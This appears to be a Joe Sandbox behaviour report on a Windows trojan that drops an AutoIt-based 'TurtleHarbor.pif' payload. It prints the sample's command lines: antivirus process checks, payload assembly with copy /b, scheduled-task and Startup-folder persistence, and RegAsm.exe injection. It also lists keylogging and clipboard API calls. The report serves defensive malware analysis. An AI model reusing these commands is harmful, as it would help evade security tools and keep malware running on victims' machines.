Source: RegAsm.exe, 0000001A.00000002.3208069125.0000000007282000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: RegAsm.exe, 0000001A.00000002.3208069125.0000000007282000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: RegAsm.exe, 0000001A.00000002.3208069125.0000000007282000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: RegAsm.exe, 0000001A.00000002.3208069125.0000000007282000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: RegAsm.exe, 0000001A.00000002.3208069125.0000000007282000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: RegAsm.exe, 0000001A.00000002.3208069125.0000000007282000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: RegAsm.exe, 0000001A.00000002.3208069125.0000000007282000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: RegAsm.exe, 0000001A.00000002.3208069125.0000000007282000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: RegAsm.exe, 0000001A.00000002.3208069125.0000000007282000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: RegAsm.exe, 0000001A.00000002.3208069125.0000000007282000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: RegAsm.exe, 0000001A.00000002.3204845308.0000000003061000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3855499519.0000000002869000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.s
Source: RegAsm.exe, 0000001F.00000002.3855499519.0000000002869000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb/ip
Source: RegAsm.exe, 0000001F.00000002.3855499519.0000000002941000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/v9/users/
Source: Intake.pif, 0000000A.00000003.1676899367.0000000003736000.00000004.00000800.00020000.00000000.sdmp, Nevertheless.0.dr, TurtleHarbor.pif.10.dr, Intake.pif.1.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: Intake.pif.1.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: Intake.pif, 0000000A.00000003.1676899367.0000000003736000.00000004.00000800.00020000.00000000.sdmp, Nevertheless.0.dr, TurtleHarbor.pif.10.dr, Intake.pif.1.dr	String found in binary or memory: https://www.globalsign.com/repository/06

Source: C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe

Code function: 0_2_00404BB4 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00404BB4

Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 18_2_00384830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		18_2_00384830
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 20_2_00384830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		20_2_00384830

Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif

Code function: 18_2_00384632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

18_2_00384632

Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif

Code function: 18_2_00370508 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

18_2_00370508

Source: RegAsm.exe, 0000001A.00000002.3204845308.0000000003279000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: GetRawInputData

memstr_24166278-4

Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 18_2_0039D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		18_2_0039D164
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 20_2_0039D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		20_2_0039D164

System Summary

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Wscript called in batch mode (surpress errors)

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.js"

Source: C:\Users\user\AppData\Local\Temp\684126\Intake.pif

Process Stats: CPU usage > 49%

Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif

Code function: 18_2_00374254: CreateFileW,DeviceIoControl,CloseHandle,

18_2_00374254

Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif

Code function: 18_2_00368F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

18_2_00368F2E

Source: C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe	Code function: 0_2_00403415 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,	0_2_00403415
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 18_2_00375778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,	18_2_00375778
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 20_2_00375778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,	20_2_00375778

Source: C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe	Code function: 0_2_0040447D	0_2_0040447D
Source: C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe	Code function: 0_2_0040680A	0_2_0040680A
Source: C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe	Code function: 0_2_00406E34	0_2_00406E34
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 18_2_0031B020	18_2_0031B020
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 18_2_003194E0	18_2_003194E0
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 18_2_00319C80	18_2_00319C80
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 18_2_003323F5	18_2_003323F5
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 18_2_00398400	18_2_00398400
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 18_2_00346502	18_2_00346502
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 18_2_0034265E	18_2_0034265E
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 18_2_0031E6F0	18_2_0031E6F0
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 18_2_0033282A	18_2_0033282A
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 18_2_00320962	18_2_00320962
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 18_2_003489BF	18_2_003489BF
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 18_2_00390A3A	18_2_00390A3A
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 18_2_00346A74	18_2_00346A74
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 18_2_00320BE0	18_2_00320BE0
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 18_2_0033CD51	18_2_0033CD51
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 18_2_0036EDB2	18_2_0036EDB2
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 18_2_00378E44	18_2_00378E44
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 18_2_00390EB7	18_2_00390EB7
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 18_2_00346FE6	18_2_00346FE6
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 18_2_003132C0	18_2_003132C0
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 18_2_003333B7	18_2_003333B7
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 18_2_0033F409	18_2_0033F409
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 18_2_0032D45D	18_2_0032D45D
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 18_2_0032F628	18_2_0032F628
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 18_2_00311663	18_2_00311663
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 18_2_003316B4	18_2_003316B4
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 18_2_0031F6A0	18_2_0031F6A0
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 18_2_003378C3	18_2_003378C3
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 18_2_0033DBA5	18_2_0033DBA5
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 18_2_00331BA8	18_2_00331BA8
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 18_2_00319BD0	18_2_00319BD0
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 18_2_00349CE5	18_2_00349CE5
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 18_2_0032DD28	18_2_0032DD28
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 18_2_0033BFD6	18_2_0033BFD6
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 18_2_00331FC0	18_2_00331FC0
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 20_2_0031B020	20_2_0031B020
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 20_2_003194E0	20_2_003194E0
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 20_2_00319C80	20_2_00319C80
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 20_2_003323F5	20_2_003323F5
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 20_2_00398400	20_2_00398400
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 20_2_00346502	20_2_00346502
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 20_2_0034265E	20_2_0034265E
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 20_2_0031E6F0	20_2_0031E6F0
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 20_2_0033282A	20_2_0033282A
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 20_2_00320962	20_2_00320962
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 20_2_003489BF	20_2_003489BF
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 20_2_00390A3A	20_2_00390A3A
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 20_2_00346A74	20_2_00346A74
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 20_2_00320BE0	20_2_00320BE0
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 20_2_0033CD51	20_2_0033CD51
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 20_2_0036EDB2	20_2_0036EDB2
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 20_2_00378E44	20_2_00378E44
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 20_2_00390EB7	20_2_00390EB7
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 20_2_00346FE6	20_2_00346FE6
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 20_2_003132C0	20_2_003132C0
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 20_2_003333B7	20_2_003333B7
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 20_2_0033F409	20_2_0033F409
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 20_2_0032D45D	20_2_0032D45D
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 20_2_0032F628	20_2_0032F628
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 20_2_00311663	20_2_00311663
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 20_2_003316B4	20_2_003316B4
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 20_2_0031F6A0	20_2_0031F6A0
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 20_2_003378C3	20_2_003378C3
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 20_2_0033DBA5	20_2_0033DBA5
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 20_2_00331BA8	20_2_00331BA8
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 20_2_00319BD0	20_2_00319BD0
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 20_2_00349CE5	20_2_00349CE5
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 20_2_0032DD28	20_2_0032DD28
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 20_2_0033BFD6	20_2_0033BFD6
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 20_2_00331FC0	20_2_00331FC0

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\684126\Intake.pif D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD

Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe

Process token adjusted: Security

Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: String function: 00314DC0 appears 40 times
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: String function: 00338B30 appears 84 times
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: String function: 00321A36 appears 68 times
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: String function: 00339FA5 appears 46 times
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: String function: 003339FB appears 36 times
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: String function: 00321CB6 appears 49 times
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: String function: 0033312D appears 42 times
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: String function: 00312111 appears 38 times
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: String function: 00330D17 appears 140 times
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: String function: 00341B70 appears 60 times

Source: e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe, 00000000.00000002.1652032736.00000000005F5000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: OriginalFilenameCmd.Exej% vs e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe

Source: e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.expl.evad.winEXE@46/23@1/0

Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif

Code function: 18_2_0037A6AD GetLastError,FormatMessageW,

18_2_0037A6AD

Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 18_2_00368DE9 AdjustTokenPrivileges,CloseHandle,	18_2_00368DE9
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 18_2_00369399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	18_2_00369399
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 20_2_00368DE9 AdjustTokenPrivileges,CloseHandle,	20_2_00368DE9
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 20_2_00369399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	20_2_00369399

Source: C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe

Code function: 0_2_0040400B GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_0040400B

Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif

Code function: 18_2_00374148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification,

18_2_00374148

Source: C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe

Code function: 0_2_00402218 CoCreateInstance,

0_2_00402218

Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif

Code function: 18_2_0037443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,

18_2_0037443D

Source: C:\Users\user\AppData\Local\Temp\684126\Intake.pif

File created: C:\Users\user\AppData\Local\SecureData Technologies

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7652:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1060:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7588:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7124:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7352:120:WilError_03

Source: C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe

File created: C:\Users\user\AppData\Local\Temp\nstCC4D.tmp

Jump to behavior

Source: C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe

Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Luck Luck.bat & Luck.bat & exit

Source: e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe	ReversingLabs: Detection: 39%
Source: e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe	Virustotal: Detection: 35%

Source: C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe

File read: C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe "C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe"
Source: C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Luck Luck.bat & Luck.bat & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 684126
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "VegetablesIndividualBindingGba" Ever
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Wire + ..\Qualified + ..\Manufacturers + ..\Wesley + ..\Haiti + ..\Done + ..\Drop + ..\Runner + ..\Defend + ..\Judy + ..\Dow C
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\684126\Intake.pif Intake.pif C
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\684126\Intake.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Additionally" /tr "wscript //B 'C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.js'" /sc minute /mo 5 /F
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Additionally" /tr "wscript //B 'C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.js'" /sc minute /mo 5 /F
Source: C:\Users\user\AppData\Local\Temp\684126\Intake.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TurtleHarbor.url" & echo URL="C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TurtleHarbor.url" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif "C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif" "C:\Users\user\AppData\Local\SecureData Technologies\Y"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif "C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif" "C:\Users\user\AppData\Local\SecureData Technologies\Y"
Source: C:\Users\user\AppData\Local\Temp\684126\Intake.pif	Process created: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\684126\Intake.pif	Process created: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe
Source: C:\Users\user\AppData\Local\Temp\684126\Intake.pif	Process created: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe
Source: C:\Users\user\AppData\Local\Temp\684126\Intake.pif	Process created: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
